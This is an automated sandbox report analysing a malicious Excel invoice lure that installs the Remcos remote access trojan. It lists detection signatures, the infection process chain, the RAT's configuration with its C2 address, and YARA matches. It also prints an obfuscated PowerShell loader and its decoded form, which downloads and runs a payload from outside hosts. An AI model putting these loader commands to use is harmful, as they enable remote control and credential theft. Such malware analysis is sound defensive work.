Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
August Shipment - Inv No. 041.xls

Overview

General Information

Sample name:August Shipment - Inv No. 041.xls
Analysis ID:1500455
MD5:f86a185db8b9a383245e2639a234e7aa
SHA1:12cd9aed8efe4708fcb05df2537cae919c0a7342
SHA256:227c0d045a590bfd1e70044c6d01a62cae7c9b0a90b1c4165be4c987aa635a74
Tags:xls
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3512 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 3784 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 4084 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3180 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3264 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBG? ? ? ? ?EM? ? ? ? ?QgBS? ? ? ? ?C8? ? ? ? ?Nw? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?5? ? ? ? ?C4? ? ? ? ?N? ? ? ? ?? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?Lg? ? ? ? ?0? ? ? ? ?Dg? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?Dc? ? ? ? ?Mw? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 2692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FCBR/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • RegAsm.exe (PID: 3008 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 3412 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\eibgqlhhydk" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 1236 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\pcgrqdsjmlcrsdy" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 652 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zeljrwdcztuwukmaun" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "45.90.89.98:8243:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-O0U3JA", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x2049:$obj2: \objdata
  • 0x2031:$obj3: \objupdate
  • 0x2010:$obj4: \objemb
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F3AD743.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x2049:$obj2: \objdata
  • 0x2031:$obj3: \objupdate
  • 0x2010:$obj4: \objemb
SourceRuleDescriptionAuthorStrings
0000000E.00000002.997515162.0000000000911000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6c4b8:$a1: Remcos restarted by watchdog!
          • 0x6ca30:$a3: %02i:%02i:%02i:%03i
          Click to see the 20 entries
          SourceRuleDescriptionAuthorStrings
          13.2.powershell.exe.43deb20.1.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            13.2.powershell.exe.43deb20.1.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
